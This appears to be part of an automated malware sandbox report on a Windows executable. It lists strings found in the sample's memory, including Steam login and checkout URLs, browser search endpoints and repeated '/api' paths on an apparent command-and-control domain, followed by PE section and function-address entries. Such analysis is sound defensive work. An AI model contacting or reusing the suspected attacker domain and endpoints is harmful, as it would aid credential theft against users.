Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.(
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampow
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.f
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.sth
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: MaZjv5XeQi.exe, 00000000.00000003.2240279376.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286575761.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/5
                Source: MaZjv5XeQi.exe, 00000000.00000003.2233252191.00000000057B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/MSWznTY69wwRW38B95
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2182870338.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2207101478.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2181402365.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206927029.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206818863.00000000057AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/MSWznTY69wwRW38B95-
                Source: MaZjv5XeQi.exe, 00000000.00000003.2180876019.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2180972685.00000000057AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/MSWznTY69wwRW38B95y2
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/PPL
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286575761.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/U
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/V4
                Source: MaZjv5XeQi.exe, 00000000.00000003.2207101478.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206927029.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206818863.00000000057AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/WC
                Source: MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2158093066.000000000579D000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2158038574.000000000579B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: MaZjv5XeQi.exe, 00000000.00000003.2180876019.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2180972685.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2181402365.00000000057AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api0GUP
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apia3
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apih3
                Source: MaZjv5XeQi.exe, 00000000.00000003.2286706213.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                Source: MaZjv5XeQi.exe, 00000000.00000003.2233712383.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apita
                Source: MaZjv5XeQi.exe, 00000000.00000003.2233712383.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apixI
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piy7
                Source: MaZjv5XeQi.exe, 00000000.00000003.2233422671.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2240279376.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/sy7
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286575761.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/u
                Source: MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaizedH
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamai

                System Summary

                Source: MaZjv5XeQi.exe | Static PE information: section name:
                Source: MaZjv5XeQi.exe | Static PE information: section name: .idata
                Source: MaZjv5XeQi.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009E0460
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009DC5A0
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009AE687
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009A8600
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009E0D20
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009D8EA0
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009ACE45
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009AB100
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009D9280
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009B1227
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009CD34A
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009C7440
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009B57C0
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009C1D00
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_00AAC0AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009CC09E
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_00ADA0B6
